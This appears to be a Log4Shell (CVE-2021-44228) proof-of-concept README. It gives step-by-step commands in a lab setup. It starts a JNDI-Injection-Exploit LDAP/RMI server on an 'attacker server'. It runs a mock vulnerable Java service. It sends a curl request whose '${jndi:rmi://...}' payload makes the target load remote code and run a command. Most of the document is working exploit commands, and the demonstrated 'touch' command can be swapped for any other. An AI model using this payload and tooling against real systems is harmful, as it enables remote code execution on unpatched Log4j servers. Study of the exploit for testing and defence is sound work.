Share 
## https://sploitus.com/exploit?id=3B7408B1-9041-550E-9CB8-83E5F609C37B
# cve-2021-44228-log4j

[CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228)

---

# Quickstart

### Concept

- Attacker Server IP: 172.18.5.189
- PRD Server IP: 172.18.5.191


### Step1: Start LDAP/RMI Services. [On Attacker Server]


Download Jar: [JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar](./jar/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar)

Start Services.

```sh
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A "172.18.5.189" -C "touch /tmp/cve-2021-44228-log4j"
```

Output:

![start-ldap-rmi-serices](./screenshot/start-ldap-rmi-serices.jpg)


### Step2: Mock a PRD Service. [On PRD Server]

Download Jar: [log4jRCE-0.0.1-SNAPSHOT.jar](jar/log4jRCE-0.0.1-SNAPSHOT.jar)

Run Services.

```sh
java -jar log4jRCE-0.0.1-SNAPSHOT.jar
```

Service run on 8080. This Service will logging whatever be sent to `/login` API.

![mock_prd_service](./screenshot/mock_prd_service.jpg)


### Step3: Make a request to PRD Service. [Any Servers]

```sh
curl -X POST 'http://172.18.5.191:8080/login' --data-urlencode 'data=${jndi:rmi://172.18.5.189:1099/spring}'
```

Result:

![make_a_request](screenshot/make_a_request.jpg)

Temp file has been created.

![tmp_file](screenshot/tmp_file.jpg)


# Reference

- [welk1n/JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit)
- [jas502n/Log4j2-CVE-2021-44228](https://github.com/jas502n/Log4j2-CVE-2021-44228)